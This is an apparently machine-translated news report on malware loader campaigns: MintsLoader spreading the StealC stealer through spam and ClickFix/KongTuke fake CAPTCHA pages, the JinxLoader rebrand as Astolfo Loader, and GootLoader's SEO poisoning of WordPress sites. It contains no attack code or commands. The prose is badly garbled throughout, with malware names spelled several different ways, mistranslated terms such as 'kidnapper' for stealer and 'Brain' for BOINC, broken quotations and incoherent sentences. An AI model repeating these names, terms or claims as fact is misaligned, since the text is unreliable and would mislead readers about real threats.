Hunting threats described in detail the current company that uses the loader’s malware called MINTSLOAADER to spread secondary useful loads such as Stealc Information kidnapper and legitimate network computing with open source called Brain.
“MINSLOAADER is a PowerShell malware boot, which was delivered through spam, citing Kongtuke/Clickfix pages or JScript file,” the Esentire cybers safety said. said In the analysis.
The company was aimed at the electricity, oil and gas and legal services sector in the United States and Europe, according to a company that discovered activities in early January 2025.
Development occurs against the background a Splash of malicious companies abusing counterfeit CAPTCHA checks to force users to copy and execute the PowerShell scripts to bypass the checks, the method that became known to ClickFix and Kongtuke.
“Kongtuke includes entered script, which currently makes the related websites show fake pages” Confirm what you are human “,” Palo Alto Networks Unit 42 said In a report with a detailed description of the BOINC distribution company.
“These fake checks are loaded with a copy/insertion buffer with a potential victim with a malicious PowerShell scenario. The page also provides detailed instructions asking the potential victims and execute the script in the launch window. “
The attack chain documented by Esentire begins when users click on the link in the spam, which leads to the download of the confusing JavaScript file. The scenario is responsible for performing the PowerShell command to download MINSLOAADER through Curl and its execution, after which it removes itself from the host to leave the traces.
Alternative sequences are redirected by the postcards in the Clickfix -style pages that lead to MINTSLOAADER’s delivery using Windows Run.
The malicious loader, in turn, is associated with the command and management server (C2) to get intermediate PowerShell loads that perform different checks to avoid sandboxes and resist the analysis attempts. It also has a domain generation algorithm (DGA) with an initial value based on adding a C2 domain name.
The culmination of the attack is the deployment of Stealc, the kidnapped information that is sold on the malware model as services (MAAS) since the beginning of 2023. It is assumed that it has been redesigned from another malicious software known as Arkei. One of the distinctive features of the malicious software is its ability to avoid infection of machines located in Russia, Ukraine, Belarus, Kazakhstan or Uzbekistan.
News about Mintsloader also follow from the appearance of an updated version Jinxloader The name Astolfo Loader (aka Jinx V3), which was rewritten on C ++, probably for performance reasons after its source code was sold to the author of malware Rendnza two separate Delfin and Astolfoloader buyers.
“Although @delfin claims that sells JinxloadB2 unchanged, @astOolfoloader decided to rebrand the malicious FC and change the plug to C ++ (Jinx V3) instead of using the original binary file, compiled celebrated at the end of last year.
“Services such as Jinxloader and its successor, Astolfo Loader (Jinx V3) show how such tools can spread quickly and at an affordable price, and they can be purchased through popular public hacker forums available to virtually anyone who has an internet connection” .
Cybersecurity researchers also shed light on internal work Gottloader companies malicious programs that are of course to arm Search optimization poisoning (SEO) to redirect the victims seeking agreements and contracts to compromised WordPress sites that place a realistic ad board to download a file containing what they are looking for.
Malware operators have been found to make changes to WordPress sites that make these sites dynamically download the contents of fake forum pages from another server, which Sophos calls a “maternal ship”.
Goodloader companies, besides the geosonation of IP address ranges and permission to receive requests from certain interesting countries, go on, allowing the potential victim to visit the infected site only once every 24 hours, adding an IP address to the lock list.
“Every aspect of this process is confused to such an extent that even the owners of the compromised WordPress pages often cannot identify modifications on their own site or cause launching Gotloader Code if they visit their own pages,” – Gabor Sapanas Research said.
